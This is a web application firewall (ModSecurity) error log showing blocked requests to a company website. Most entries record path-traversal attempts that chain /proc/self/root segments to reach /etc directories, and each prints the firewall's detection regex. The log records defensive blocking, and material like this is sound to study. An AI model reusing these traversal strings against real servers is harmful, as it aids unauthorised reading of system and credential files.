[Mon Mar 16 14:24:19.334343 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.241.46:48592] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8w6QpVkWug9HeOt8-wgAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:24:21.799392 2026] [:error] [pid 14895:tid 140411725141760] [client 74.7.243.203:57802] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8xVajLEzk2WiQ-10a-gAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:24:23.799122 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.244.31:56008] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg8x9SswJuvopo3lOhoIgAAAJg"]
[Mon Mar 16 14:24:27.485816 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:60358] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8y9SswJuvopo3lOhoJgAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:24:35.676371 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.243.203:60372] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8046lpbStxTqkSkt1RgAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:24:36.984855 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.243.203:51360] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg81HjZBu2q05ozVU9iDQAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:24:43.749291 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.243.203:51362] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg827ysWC90G-1nBrBNXgAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:24:47.035064 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.241.46:48770] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8346lpbStxTqkSkt1UQAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:24:48.378609 2026] [:error] [pid 14895:tid 140411674785536] [client 74.7.241.46:41048] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg84FajLEzk2WiQ-10bBQAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:24:49.385624 2026] [:error] [pid 14895:tid 140411741927168] [client 74.7.243.203:60764] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg84VajLEzk2WiQ-10bBgAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:24:50.679750 2026] [:error] [pid 14895:tid 140411540502272] [client 74.7.241.46:41064] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg84lajLEzk2WiQ-10bCgAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:24:52.782948 2026] [:error] [pid 21533:tid 140411557287680] [client 74.7.243.203:40266] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg85HjZBu2q05ozVU9iEAAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:25:00.932827 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.243.203:40274] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg87LABkC4fWIHEf8H4HwAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:25:03.561789 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.243.203:44506] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg873jZBu2q05ozVU9iEwAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:25:13.163904 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:41068] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8-dSswJuvopo3lOhoOwAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:25:27.699986 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.243.203:44518] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9B6TCbgAP5jq5Teg0VQAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:25:32.199121 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.243.203:33222] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9DP9ocpUE4ed4uDz4vwAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:25:35.587634 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.243.203:34358] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9D46lpbStxTqkSkt1WQAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:25:36.031023 2026] [:error] [pid 15061:tid 140411699963648] [client 74.7.241.46:47746] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9EKTCbgAP5jq5Teg0XQAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:25:38.023385 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.243.203:34366] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9Eo6lpbStxTqkSkt1WwAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:25:41.492904 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.243.203:34382] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9FdSswJuvopo3lOhoRwAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:25:56.779950 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:44250] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9JLABkC4fWIHEf8H4QwAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
